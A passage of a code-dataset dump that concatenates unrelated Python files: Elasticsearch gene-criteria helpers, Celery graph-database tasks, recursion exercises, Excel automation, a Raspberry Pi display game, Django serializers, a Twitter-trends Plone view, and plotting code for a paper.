loss', False)])\n '''\n functional_info = marker_functional_info(marker_doc)\n # print(functional_info)\n\n is_in_exon = False\n\n if functional_info['has non-synonymous missense'] or\\\n functional_info['has synonymous'] or functional_info['has non-synonymous frameshift'] or\\\n functional_info['has reference'] or functional_info['has stop gain'] or\\\n functional_info['has stop loss']:\n is_in_exon = True\n\n # gene_symbols = []\n if is_in_exon:\n gene_ids = gene_info(marker_doc)\n ensembl_gene_ids = gene_ids.values()\n# gene_symbols.extend(list(gene_ids.keys()))\n# print(ensembl_gene_ids)\n# for gene in gene_symbols:\n# print('^^^\\t'+gene)\n else:\n return result_container\n\n dil_study_id = feature_doc['dil_study_id']\n fnotes = None\n if dil_study_id:\n query = ElasticQuery(Query.ids([dil_study_id]))\n elastic = Search(search_query=query, idx=ElasticSettings.idx('STUDY', 'STUDY'), size=1)\n study_doc = elastic.search().docs[0]\n author = getattr(study_doc, 'authors')[0]\n first_author = author['name'] + ' ' + author['initials']\n fnotes = {'linkid': dil_study_id, 'linkname': first_author}\n\n result_container_populated = cls.populate_container(marker,\n marker,\n fnotes=fnotes, features=ensembl_gene_ids,\n diseases=[disease],\n result_container=result_container)\n\n return result_container_populated\n\n @classmethod\n def fetch_disease_locus(cls, hits_docs):\n\n region_index = ElasticSettings.idx('REGIONS', idx_type='DISEASE_LOCUS')\n disease_loc_docs = []\n locus_id_set = set()\n for doc in hits_docs.docs:\n locus_id = getattr(doc, 'disease_locus')\n if locus_id not in locus_id_set:\n locus_id_set.add(locus_id)\n query = ElasticQuery(Query.ids([locus_id]))\n elastic = Search(query, idx=region_index)\n disease_loc = elastic.search().docs\n if(len(disease_loc) == 1):\n disease_loc_docs.append(disease_loc[0])\n else:\n logger.critical('disease_locus doc not found for it ' + locus_id)\n\n return disease_loc_docs\n\n @classmethod\n def get_gene_docs_by_ensembl_id(cls, ens_ids, sources=None):\n ''' Get the gene symbols for the corresponding array of ensembl IDs.\n A dictionary is returned with the key being the ensembl ID and the\n value the gene document. '''\n query = ElasticQuery(Query.ids(ens_ids), sources=sources)\n elastic = Search(query, idx=ElasticSettings.idx('GENE', idx_type='GENE'), size=len(ens_ids))\n return {doc.doc_id(): doc for doc in elastic.search().docs}\n\n @classmethod\n def get_disease_tags(cls, feature_id, idx_type=None):\n 'Function to get disease tags for a given feature_id...delegated to parent class Criteria. Returns disease docs'\n idx = ElasticSettings.idx(cls.FEATURE_TYPE.upper()+'_CRITERIA')\n docs = Criteria.get_disease_tags(feature_id, idx, idx_type)\n return docs\n\n @classmethod\n def get_disease_tags_as_codes(cls, feature_id):\n '''Function to get disease tags for a given feature_id...delegated to parent class Criteria\n Returns disease codes'''\n disease_docs = cls.get_disease_tags(feature_id)\n disease_codes = [getattr(disease_doc, 'code') for disease_doc in disease_docs]\n return disease_codes\n\n @classmethod\n def get_all_criteria_disease_tags(cls, qids, idx_type=None):\n\n (idx, idx_types) = cls.get_feature_idx_n_idxtypes(cls.FEATURE_TYPE)\n\n if idx_type is None:\n idx_type = idx_types\n\n criteria_disease_tags = Criteria.get_all_criteria_disease_tags(qids, idx, idx_type)\n return(criteria_disease_tags)\n\n @classmethod\n def get_disease_codes_from_results(cls, criteria_results):\n idx = ElasticSettings.idx(cls.FEATURE_TYPE.upper()+'_CRITERIA')\n codes = Criteria.get_disease_codes_from_results(idx, criteria_results)\n return sorted(codes)\n\n @classmethod\n def get_available_criterias(cls, feature=None, config=None):\n 'Function to get available criterias for gene'\n if config is None:\n config = CriteriaManager.get_criteria_config()\n\n if feature is None:\n feature = cls.FEATURE_TYPE\n\n available_criterias = Criteria.get_available_criterias(feature, config)\n return available_criterias\n\n @classmethod\n def get_criteria_details(cls, feature_id, idx=None, idx_type=None, config=None):\n 'Function to get the criteria details for a given feature_id'\n if idx is None:\n idx = ElasticSettings.idx(cls.FEATURE_TYPE.upper()+'_CRITERIA')\n\n # get all the criterias from ini\n criteria_list = []\n if idx_type is None:\n available_criterias = cls.get_available_criterias(feature=cls.FEATURE_TYPE, config=config)\n criteria_list = available_criterias[cls.FEATURE_TYPE]\n idx_type = ','.join(criteria_list)\n\n result_dict = Criteria.get_criteria_details(feature_id, idx, idx_type)\n result_dict_expanded = Criteria.add_meta_info(idx, criteria_list, result_dict)\n print(result_dict_expanded)\n return result_dict_expanded\n","sub_path":"criteria/helper/gene_criteria.py","file_name":"gene_criteria.py","file_ext":"py","file_size_in_byte":14269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"410983593","text":"from celery import shared_task\n\nfrom src.apps.graph.client.services import client_graph_service\nimport logging\n\nlogger = logging.getLogger(__name__)\n\n\n@shared_task\ndef create_client_in_graphdb_task(client_uid):\n return client_graph_service.create_client_in_graphdb(client_uid)['client_uid']\n\n\n@shared_task(bind=True, max_retries=3, default_retry_delay=180)\ndef create_ta_topic_in_graphdb_task(self, client_uid, ta_topic_uid, topic_uid):\n try:\n return client_graph_service.create_ta_topic_in_graphdb(client_uid, ta_topic_uid, topic_uid)['ta_topic_uid']\n except Exception as e:\n # this can happen in the admin screen. Example: we add a topic and then sub topics. The Sub-topic tasks runs\n # before the main parent topic even runs. We should wait until the main topic runs, then re-do this task in that\n # case.\n ex = Exception(\n \"Error creating ta topic. client_uid: %s ta_topic_uid: %s topic_uid: %s\" %\n (client_uid, ta_topic_uid, topic_uid,)\n ).with_traceback(e.__traceback__)\n\n logger.debug(ex, exc_info=True)\n\n self.retry(exc=ex)\n\n\n@shared_task(bind=True, max_retries=3, default_retry_delay=180)\ndef delete_client_in_graphdb_task(self, client_uid):\n try:\n return client_graph_service.delete_client_in_graphdb(client_uid)\n except Exception as e:\n logger.debug(e, exc_info=True)\n self.retry(exc=e)\n\n\n@shared_task(bind=True, max_retries=3, default_retry_delay=180)\ndef delete_ta_topic_in_graphdb_task(self, client_uid, ta_topic_uid):\n try:\n return client_graph_service.delete_ta_topic_in_graphdb(client_uid, ta_topic_uid)\n except Exception as e:\n logger.debug(e, exc_info=True)\n self.retry(exc=e)\n","sub_path":"src/apps/graph/client/services/client_graph_tasks.py","file_name":"client_graph_tasks.py","file_ext":"py","file_size_in_byte":1655,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"88024126","text":"# my first attempt at problem on p.118\n# def recursive_sum(li,s=0):\n# \ts += li.pop()\n# \tif len(li) > 0:\n# \t\treturn recursive_sum(li,s)\n# \telse:\n# \t\treturn s\n\n\n# print recursive_sum([1,2,3,4])\n\n# self check p.122\n\n# def rev(st):\n# \tst = list(st)\n# \tl = len(st)\n# \trv_st = ''\n# \tfor i in range(l):\n# \t\trv_st += st.pop()\n# \treturn rv_st\n\n# print rev('joseph')\n\t\n\n# def rev_rec(st,rv_st):\n# \tif len(st) == 1:\n# \t\trv_st += st[0]\n# \t\treturn rv_st\n# \telse:\n# \t\tst = list(st)\n# \t\trv_st += st.pop()\n# \t\treturn rev_rec(st,rv_st)\n\n# print rev_rec('joseph','')\n\n\n# # is this possible?\n# def rev_rec(st):\n# \tif len(st) == 1:\n# \t\treturn st\n# \telse:\n# \t\treturn list(st).pop() + rev_rec(st)\n\n\n# p.123 palimdromer featuring recursion\n# def palin_rec(st):\n# \tif len(st) < 2:\n# \t\treturn True\n# \telif st[0] == st[-1:]:\n# \t\treturn palin_rec(st[1:-1])\n# \telse:\n# \t\treturn False\n\n# print palin_rec('josesoj')\n# print palin_rec('josetrewqlkjhgfds a sdfghjklqwertesoj')\n\n\nimport turtle\nmy_turtle = turtle.Turtle()\nmy_turtle.speed(0.0001)\nmy_win = turtle.Screen()\ndef draw_spiral(my_turtle, line_len):\n\tif lineLen > 0:\n\t\tmy_turtle.forward(line_len)\n\t\tmy_turtle.right(90)\n\t\tdraw_spiral(my_turtle, line_len - 5)\ndraw_spiral(my_turtle, 100)\nmy_win.exitonclick()\n","sub_path":"chpt4.py","file_name":"chpt4.py","file_ext":"py","file_size_in_byte":1235,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"21655580","text":"import win32com.client\nimport webbrowser\nimport temp.temp as temp\n\nimport testHead\n\n\n\n\nexcel = win32com.client.Dispatch(\"Excel.Application\")\nexcel.Visible = True\nwb = excel.Workbooks.Add()\nws = wb.Worksheets(\"Sheet1\")\nws.Cells(1,1).Value = \"hello world\"\n\n\nexpenses =(\n [\"test1\", 100001]\n , [\"test2\", 100002]\n , [\"test3\", 100003]\n , [\"test4\", 100004]\n , [\"test5\", 100005]\n , [\"test6\", 100006]\n , [\"test7\", 100007]\n)\n\nrow = 2\ncol = 1\nval = 1\n\nfor item, cost in(expenses):\n ws.Cells(row, 1).Value = item\n ws.Cells(row, 2).Value = cost\n row = row +1\n\n print(row)\n print(item)\n print(cost)\n\n\n\n\nurl = 'http://naver.com'\n\n# MacOS\n#chrome_path = 'open -a /Applications/Google\\ Chrome.app %s'\n\n# Windows\n# chrome_path = 'C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe %s'\n# webbrowser.get(chrome_path).open(url)\n#\n# print(chrome_path)\n# print(url)\n\n# 닫기\nexcel.Application.Quit()\n\n\n\nprint(temp.temp() )\n\n\n\n\n\n\n\n\n\n","sub_path":"test01.py","file_name":"test01.py","file_ext":"py","file_size_in_byte":958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"106506488","text":"from torchvision import transforms\r\n\r\nbackbone = dict(\r\n type='ResNeXt',\r\n depth=50,\r\n stage_with_context_block=[False, True, True, True],\r\n context_block_cfg=dict(ratio=1./4),\r\n pretrained=True,)\r\n\r\ndata = dict(\r\n dataset_path='/home1/liangjianming/imet-2019-fgvc6/train',\r\n datalist_path='/home1/liangjianming/imet-2019-fgvc6/train.csv',\r\n batch_size=64,\r\n train_transform=transforms.Compose([\r\n transforms.RandomHorizontalFlip(),\r\n transforms.Resize((224, 224)),\r\n transforms.ToTensor(),\r\n transforms.Normalize(mean=[0.485, 0.456, 0.406],\r\n std=[0.229, 0.224, 0.225])\r\n ]),\r\n test_transform=transforms.Compose([\r\n transforms.Resize((224, 224)),\r\n transforms.ToTensor(),\r\n transforms.Normalize(mean=[0.485, 0.456, 0.406],\r\n std=[0.229, 0.224, 0.225])\r\n ]),)\r\n\r\ntrain = dict(\r\n epoch=100,\r\n lr=0.01,\r\n weight_decay=0.0001,\r\n momentum=0.9,\r\n lr_cfg=dict(\r\n gamma=0.1,\r\n step=[60, 80]),\r\n validate_thresh=1/7,\r\n accumulate_batch_size=256,\r\n mixup=True,\r\n checkpoint=None,)\r\n\r\n\r\nlog = dict(\r\n log_dir='./work_dir/resnext50/resnext50_gc_mixup',\r\n log_file='resnext50_gc_mixup.log',\r\n print_frequency=50,)\r\n\r\n","sub_path":"config/resnext50_gc_mixup.py","file_name":"resnext50_gc_mixup.py","file_ext":"py","file_size_in_byte":1392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"33216749","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.4 (62061)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-x86_64/egg/wwp/twitter/browser/updatetweetview.py\n# Compiled at: 2009-08-20 06:55:22\nfrom zope.interface import implements, Interface\nfrom Products.Five import BrowserView\nfrom Products.CMFCore.utils import getToolByName\nfrom wwp.twitter import twitterMessageFactory as _\nimport datetime, time, twitter, find_urls, simplejson, urllib, random\n\nclass IupdatetweetView(Interface):\n \"\"\"\n updatetweet view interface\n \"\"\"\n __module__ = __name__\n\n def test():\n \"\"\" test method\"\"\"\n pass\n\n\nclass updatetweetView(BrowserView):\n \"\"\"\n updatetweet browser view\n \"\"\"\n __module__ = __name__\n implements(IupdatetweetView)\n\n def __init__(self, context, request):\n self.context = context\n self.request = request\n\n @property\n def portal_catalog(self):\n return getToolByName(self.context, 'portal_catalog')\n\n @property\n def portal(self):\n return getToolByName(self.context, 'portal_url').getPortalObject()\n\n def test(self):\n \"\"\"\n test method\n \"\"\"\n dummy = _('a dummy string')\n return {'dummy': dummy}\n\n def twitter_trends(self):\n today = datetime.datetime.now()\n self.context.lastupdate.append(today)\n raw_trends = urllib.urlopen('http://search.twitter.com/trends/current.json')\n result = simplejson.load(raw_trends)\n trends_out = []\n for time in result['trends']:\n for item in result['trends'][time]:\n trends_out.append(item['name'])\n\n i = 0\n trend_links = []\n while i < len(trends_out):\n trend_str = trends_out[i].replace(' ', '+')\n trend_str = trend_str.replace('#', '%23')\n trenditem = '
'\n trenditem += ''\n trend_links.append(trenditem)\n i += 1\n\n self.context.trends_info = trend_links\n if self.context.postresults:\n string_list = 'http://tiny.cc/MeYTX Top Tweets Today: ' + (', ').join(trends_out[:5])\n api = twitter.Api(username=self.context.username, password=self.context.password)\n statuses = api.PostUpdate(status=string_list[:140], in_reply_to_status_id=None)\n root_app = self.context.restrictedTraverse('news')\n news_id = 'Top tweets ' + str(today)\n news_id = news_id.replace(' ', '-')\n news_id = news_id.replace(':', '-')\n newspost_list = 'Top 10 Tweets:
NomeMatrículaCPFAnoPeríodoCursoMoradiaTransporteTransporte IntermunicipalAlimentaçãoTotal
' + trends_out[i] + 'Search GoogleSearch Twitter
' + ('').join(trend_links) + '
'\n news_item = root_app.invokeFactory(type_name='News Item', id=news_id, title='Top Words on ' + str(today), description='The most popular words on twitter are :', text=newspost_list)\n root_app.reindexObject()\n root_app = self.context.restrictedTraverse('news/' + news_id)\n urltool = getToolByName(self.context, 'portal_url')\n workflow = getToolByName(self.context, 'portal_workflow')\n review_state = workflow.getInfoFor(root_app, 'review_state')\n if review_state != 'published':\n error = workflow.doActionFor(root_app, 'publish', comment='publised programmatically')\n return self.context.trends_info","sub_path":"pycfiles/wwp.twitter-1.0dev-py2.4/updatetweetview.py","file_name":"updatetweetview.py","file_ext":"py","file_size_in_byte":3660,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"378914270","text":"import numpy as np\nimport cv2\nfrom dataPath import DATA_PATH\n\n# Read input image\nimg = cv2.imread(DATA_PATH + \"images/book.jpeg\")\n# Convert to grayscale\nimgGray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\n\ncv2.imshow(\"Image\",img)\ncv2.imshow(\"Gray\",imgGray)\ncv2.waitKey(0)\n\n# Initiate ORB detector\norb = cv2.ORB_create()\n\n# find the keypoints with ORB\nkp = orb.detect(imgGray,None)\n\n# compute the descriptors with ORB\nkp, des = orb.compute(imgGray, kp)\n\n# draw keypoints location, size and orientation\nimg2 = cv2.drawKeypoints(img, kp, None, color=(0,255,0), flags=cv2.DRAW_MATCHES_FLAGS_DRAW_RICH_KEYPOINTS)\n\ncv2.imshow(\"Keypoints\",img2)\ncv2.waitKey(0)\n\ncv2.destroyAllWindows()\n\norb = cv2.ORB_create(10)\nkp, des = orb.detectAndCompute(imgGray, None)\nimg2 = cv2.drawKeypoints(img, kp, None, color=(0,0,255), flags=cv2.DRAW_MATCHES_FLAGS_DRAW_RICH_KEYPOINTS)\n\ncv2.imshow(\"keypoints\",img2)\ncv2.waitKey(0)\n\ncv2.destroyAllWindows()\n","sub_path":"Course1/week7/Image_Features_ORB.py","file_name":"Image_Features_ORB.py","file_ext":"py","file_size_in_byte":922,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"109508801","text":"\"\"\"\r\n\r\nQuestion 22\r\nLevel 3\r\n\r\nQuestion:\r\nWrite a program to compute the frequency of the words from the input. The output should output after sorting the key alphanumerically. \r\nSuppose the following input is supplied to the program:\r\nNew to Python or choosing between Python 2 and Python 3? Read Python 2 or Python 3.\r\nThen, the output should be:\r\n2:2\r\n3.:1\r\n3?:1\r\nNew:1\r\nPython:5\r\nRead:1\r\nand:1\r\nbetween:1\r\nchoosing:1\r\nor:2\r\nto:1\r\n\r\nHints\r\nIn case of input data being supplied to the question, it should be assumed to be a console input.\r\n\"\"\"\r\n\r\nuser_input = \"New to Python or choosing between Python 2 and Python 3? Read Python 2 or Python 3.\"\r\nmyList = user_input.split(\" \")\r\nmyList.sort()\r\n\r\nvipList = []\r\nwordList = []\r\n\r\nfor word in myList:\r\n\tif vipList.count(word) == 0:\r\n\t\tvipList.append(word)\r\n\t\twordList.append([word, myList.count(word)])\r\n\r\n\r\nprint(wordList)\r\n\r\n\t\t\r\n\r\n\r\n\t\r\n","sub_path":"Challenge 22 - charFrequency.py","file_name":"Challenge 22 - charFrequency.py","file_ext":"py","file_size_in_byte":886,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"10312972","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('travel', '0013_auto_20150619_0530'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='milestone',\n name='arrival_date',\n field=models.DateField(verbose_name=\"date d'arrivée\"),\n ),\n ]\n","sub_path":"travel/migrations/0014_auto_20150620_0019.py","file_name":"0014_auto_20150620_0019.py","file_ext":"py","file_size_in_byte":427,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"375672178","text":"from rdr_db.models import *\nfrom rest_framework import serializers\nfrom django.utils.encoding import uri_to_iri\nfrom django.urls import reverse, get_script_prefix\nimport copy\n\nclass RDRResource_Serializer(serializers.ModelSerializer):\n class Meta:\n model = RDRResource\n fields = ('__all__')\n\nclass RDRResource_Serializer_Plus(serializers.ModelSerializer):\n DetailURL = serializers.SerializerMethodField()\n updated_at = serializers.DateTimeField(format='%Y-%m-%d %H:%M:%S %Z')\n \n def get_DetailURL(self, RDRResource):\n http_request = self.context.get('request')\n if http_request:\n return http_request.build_absolute_uri(uri_to_iri(reverse('rdr-detail-rdrid', args=[RDRResource.rdr_resource_id])))\n else:\n return ''\n \n class Meta:\n model = RDRResource\n fields = copy.copy([f.name for f in RDRResource._meta.get_fields(include_parents=False)])\n fields.append('DetailURL')\n\nclass RDR_CSA_Serializer(serializers.ModelSerializer):\n csa_feature_user_description = serializers.SerializerMethodField()\n csa_email = serializers.SerializerMethodField()\n gateway_recommended_use = serializers.SerializerMethodField()\n gateway_support_attributes = serializers.SerializerMethodField()\n \n def get_csa_feature_user_description(self, RDRResource):\n return RDRResource.other_attributes['community_software_area_feature_user_description']\n def get_csa_email(self, RDRResource):\n return RDRResource.other_attributes['community_software_area_email']\n def get_gateway_recommended_use(self, RDRResource):\n return RDRResource.other_attributes['gateway_recommended_use']\n def get_gateway_support_attributes(self, RDRResource):\n try:\n return ', '.join(RDRResource.other_attributes['gateway_support']['gateway_support_attributes'])\n except:\n return None\n \n class Meta:\n model = RDRResource\n fields = ['info_resourceid', 'resource_descriptive_name', 'resource_description', 'gateway_recommended_use', 'gateway_support_attributes',\n 'csa_feature_user_description', 'csa_email' ]\n","sub_path":"django_xsede_warehouse/rdr_db/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":2164,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"554967120","text":"import time\nimport random\nfrom colorsys import hsv_to_rgb\nimport board\nfrom digitalio import DigitalInOut, Direction\nfrom PIL import Image, ImageDraw, ImageFont\nimport adafruit_rgb_display.st7789 as st7789\n\n# Create the display\ncs_pin = DigitalInOut(board.CE0)\ndc_pin = DigitalInOut(board.D25)\nreset_pin = DigitalInOut(board.D24)\nBAUDRATE = 24000000\n\nspi = board.SPI()\ndisp = st7789.ST7789(\n spi,\n height=240,\n y_offset=80,\n rotation=180,\n cs=cs_pin,\n dc=dc_pin,\n rst=reset_pin,\n baudrate=BAUDRATE,\n)\n\n# Input pins:\nbutton_A = DigitalInOut(board.D5)\nbutton_A.direction = Direction.INPUT\n\nbutton_B = DigitalInOut(board.D6)\nbutton_B.direction = Direction.INPUT\n\nbutton_L = DigitalInOut(board.D27)\nbutton_L.direction = Direction.INPUT\n\nbutton_R = DigitalInOut(board.D23)\nbutton_R.direction = Direction.INPUT\n\nbutton_U = DigitalInOut(board.D17)\nbutton_U.direction = Direction.INPUT\n\nbutton_D = DigitalInOut(board.D22)\nbutton_D.direction = Direction.INPUT\n\nbutton_C = DigitalInOut(board.D4)\nbutton_C.direction = Direction.INPUT\n\n# Turn on the Backlight\nbacklight = DigitalInOut(board.D26)\nbacklight.switch_to_output()\nbacklight.value = True\n\n# Create blank image for drawing.\n# Make sure to create image with mode 'RGB' for color.\nwidth = disp.width\nheight = disp.height\nimage = Image.new(\"RGB\", (width, height))\n\n# Get drawing object to draw on image.\ndraw = ImageDraw.Draw(image)\n\n# Clear display.\ndraw.rectangle((0, 0, width, height), outline=0, fill=(0, 0, 0))\ndisp.image(image)\n\n# Get drawing object to draw on image.\ndraw = ImageDraw.Draw(image)\n\n# Draw a black filled box to clear the image.\ndraw.rectangle((0, 0, width, height), outline=0, fill=0)\n\nudlr_fill = \"#00FF00\"\nudlr_outline = \"#00FFFF\"\nbutton_fill = \"#FF00FF\"\nbutton_outline = \"#FFFFFF\"\n\nfnt = ImageFont.truetype(\"/usr/share/fonts/truetype/dejavu/DejaVuSans.ttf\", 30)\n\nx = width / 2 - 15\ny = height - 30\nw = 30\nh = 10\n\n\nclass DisplayImage:\n def __init__(self):\n displayImage = Image.open(\"missile.png\")\n\n\nclass Enemy:\n def __init__(self, x, y):\n self.x = x\n self.y = y\n #draw.rectangle((x, y, x+10, y+10), outline=udlr_outline)\n \n self.image = Image.open(\"missile.png\")\n self.image = self.image.resize((width//2, height//2), Image.BICUBIC)\n #self.image = self.image.crop((self.x, self.y, self.x + width, self.y + height))\n disp.image(self.image)\n \n def move(self):\n self.y += 5\n draw.rectangle((self.x, self.y, self.x+10, self.y+10), outline=udlr_outline)\n '''\n self.image = self.image.crop((self.x, self.y, self.x + width, self.y + height))\n disp.image(self.image)\n '''\n\n\nclass SpawnEnemy():\n def __init__(self, num):\n self.num = num\n self.arr = []\n for i in range(num):\n self.arr.append(Enemy(random.randint(0, width - 15), random.randint(0, 30) - 30))\n def move(self):\n for i in range(self.num):\n self.arr[i].move()\n\ndraw.rectangle((x, y, x+w, y+h), outline=udlr_outline, fill=udlr_fill)\nenemy = SpawnEnemy(10)\nstart = time.time()\n\n\n#temp1 = Image.open('missile.png')\n#file_out = 'missile.bmp'\n#temp1.save(file_out)\n\n\nbackground = Image.new(\"RGBA\", (width, height))\ndraw = ImageDraw.Draw(background)\n#print(help(draw))\ndraw.rectangle((0, 0, width, height), outline=0, fill=(255, 0, 0))\n\ntemp_image = Image.open('bomb-removebg-preview.png')\n#temp_image = temp_image.crop((0, 0, 0+width*0.2, height*0.2))\ntemp_image2 = Image.open('bomb.png')\n\n\nimage_coord = (50, 50)\n\ntemp_image = temp_image.resize((40, 40))\ntwidth, theight = temp_image.size[0], temp_image.size[1]\n\nfor x in range(0,twidth):# process all pixels\n for y in range(0,theight):\n data = temp_image.getpixel((x, y))\n if (data[0] == 0 and data[1] == 0 and data[2] == 0 ):\n temp_image.putpixel((x, y), background.getpixel((image_coord[0]+x,image_coord[1]+y)))\n\nbackground.paste(temp_image, (image_coord[0], image_coord[1])) # X, Y\n\n#temp_image = temp_image.resize((width, height))\n#background = Image.blend(background, temp_image, 0.5)\n\n#draw.bitmap((0, 0), temp_image)\n#draw.bitmap((width//2, height//2), temp_image2)\n#temp_width, temp_height = temp_image.width, temp_image.height\n#temp_image.crop((0, 0, 0+width*0.2, height*0.2))\n\n\n#draw.image(temp_image)\ndisp.image(background)\n\n\n'''\nwhile True:\n spawnTime = time.time() - start\n \n if spawnTime > 10:\n enemy = SpawnEnemy(10)\n start = time.time()\n \n if not button_U.value: # up pressed \n y -= 5\n if not button_D.value: # down pressed\n y += 5\n if not button_L.value: # left pressed\n x -= 5\n if not button_R.value: # right pressed\n x += 5\n\n #if not button_C.value: # center pressed\n #if not button_A.value: # A button pressed\n #if not button_B.value: # B button pressed\n \n # Clear display\n draw.rectangle((0, 0, width, height), outline=0, fill=(0, 0, 0))\n\n # Update\n enemy.move()\n draw.rectangle((x, y, x+w, y+h), outline=button_outline, fill=button_fill) \n \n # Display the Image\n disp.image(image)\n\n time.sleep(0.01)\n'''\n\n","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":5148,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"235180176","text":"# -*- coding: utf-8 -*-\n\nimport os\nfrom bar_code import detect\n\n#Çл»µ½²âÊÔͼƬÎļþ¼Ð\nos.chdir('imgs')\n\nimage_names = os.listdir()\n\nif _name_=='_main_':\n for image_name in image_names:\n detect(image_name)","sub_path":"classic/OpenCV/barcode/img_pro.py","file_name":"img_pro.py","file_ext":"py","file_size_in_byte":234,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"6815759","text":"\"\"\"Plots for RAWR paper\"\"\"\nimport pickle\nimport argparse \nimport pandas as pd\nimport matplotlib\nmatplotlib.use('agg')\nfrom plotnine import (\n ggplot, aes, facet_wrap,\n geom_histogram, geom_text, geom_segment, geom_density,\n scale_color_manual, scale_fill_manual, scale_linetype_manual,\n element_blank, element_text, element_rect, element_line,\n theme_light,\n xlim, ylim, xlab, ylab, theme\n)\n\n\nclass theme_fs(theme_light):\n \"\"\"\n A theme similar to :class:`theme_linedraw` but with light grey\n lines and axes to direct more attention towards the data.\n Parameters\n ----------\n base_size : int, optional\n Base font size. All text sizes are a scaled versions of\n the base font size. Default is 11.\n base_family : str, optional\n Base font family.\n \"\"\"\n\n def __init__(self, base_size=11, base_family='DejaVu Sans'):\n theme_light.__init__(self, base_size, base_family)\n self.add_theme(theme(\n axis_ticks=element_line(color='#DDDDDD', size=0.5),\n panel_border=element_rect(fill='None', color='#838383',\n size=1),\n strip_background=element_rect(\n fill='#DDDDDD', color='#838383', size=1),\n strip_text_x=element_text(color='black'),\n strip_text_y=element_text(color='black', angle=-90)\n ), inplace=True)\n\n\nCOLORS = [\n '#49afcd', '#ff7f0e', '#2ca02c', '#d62728', '#9467bd',\n '#8c564b', '#e377c2', '#7f7f7f', '#bcbd22', '#17becf'\n]\nFIGURES_STATS_FILE = \"data/figure_stats.pkl\"\n\n\ndef figfile(s):\n return 'auto_fig/' + str(s)\n\n\ndef create_df(nums, task, method):\n df = pd.DataFrame({'x': nums})\n df['Task'] = task\n df['Method'] = method\n return df\n\n\ndef load_data(data_file):\n with open(data_file, 'rb') as f:\n data = pickle.load(f)\n\n print(\"data\", data)\n\n len_rows = [\n create_df(data[0], \"SA Baseline\", \"Original\"),\n create_df(data[1], \"SA Baseline\", \"Reduced\"),\n create_df(data[2], \"SA Combined\", \"Original\"),\n create_df(data[3], \"SA Combined\", \"Reduced\")\n ]\n\n # count = 0\n # for val in data[1]:\n # if val == 1:\n # count += 1\n # print(\"PERCENT\", count/872)\n # exit(0)\n\n # len_rows = [\n # create_df(data[0], 'SNLI', 'Original'),\n # create_df(data[1], 'SNLI', 'Reduced'),\n # create_df(data[4], 'SQuAD', 'Original'),\n # create_df(data[5], 'SQuAD', 'Reduced'),\n # create_df(data[10], 'VQA', 'Original'),\n # create_df(data[11], 'VQA', 'Reduced')\n # ]\n\n # conf_rows = [\n # create_df(data[2], 'SNLI', 'Original'),\n # create_df(data[3], 'SNLI', 'Reduced'),\n # create_df(data[6], 'SQuAD Start', 'Original'),\n # create_df(data[7], 'SQuAD End', 'Original'),\n # create_df(data[8], 'SQuAD Start', 'Reduced'),\n # create_df(data[9], 'SQuAD End', 'Reduced'),\n # create_df(data[12], 'VQA', 'Original'),\n # create_df(data[13], 'VQA', 'Reduced')\n # ]\n\n len_df = pd.concat(len_rows)\n # len_df['Task'] = len_df['Task'].astype('category').cat.reorder_categories([\n # 'SQuAD', 'SNLI', 'VQA'\n # ])\n\n len_df['Task'] = len_df['Task'].astype('category')\n len_df['Method'] = len_df['Method'].astype('category')\n\n # conf_df = pd.concat(conf_rows)\n # conf_df['Task'] = conf_df['Task'].astype('category').cat.reorder_categories([\n # 'SQuAD Start', 'SQuAD End', 'SNLI', 'VQA'\n # ])\n # conf_df['Method'] = conf_df['Method'].astype('category')\n\n # return len_df, conf_df\n\n return len_df, None \n\n\ndef create_length_plot(len_df, legend_position='right', legend_box='vertical'):\n mean_len_df = len_df.groupby(['Task', 'Method']).mean().reset_index()\n\n mean_len_df[' '] = 'Mean Length'\n print(len_df)\n\n plt = (\n ggplot(len_df)\n + aes(x='x', fill='Method', y='..density..')\n + geom_histogram(binwidth=2, position='identity', alpha=0.6)\n + geom_text(\n aes(x='x', y=.22, label='x', color='Method'),\n mean_len_df,\n inherit_aes=False,\n format_string='{:.1f}',\n show_legend=False\n )\n + geom_segment(\n aes(x='x', xend='x', y=0, yend=.205, linetype=' '),\n mean_len_df,\n inherit_aes=False, color='black'\n )\n + scale_linetype_manual(['dashed'])\n + facet_wrap('Task')\n # + xlim(0, 40) \n + ylim(0, 0.35)\n + xlab('Example Length') + ylab('Frequency')\n + scale_color_manual(values=COLORS)\n + scale_fill_manual(values=COLORS)\n + theme_fs()\n + theme(\n aspect_ratio=1,\n legend_title=element_blank(),\n legend_position=legend_position,\n legend_box=legend_box,\n )\n )\n\n return plt\n\n\ndef create_confidence_plot(conf_df):\n plt = (\n ggplot(conf_df)\n + aes(x='x', color='Method', fill='Method')\n + geom_density(alpha=.45)\n + facet_wrap('Task', nrow=4)\n + xlab('Confidence')\n + scale_color_manual(values=COLORS)\n + scale_fill_manual(values=COLORS)\n 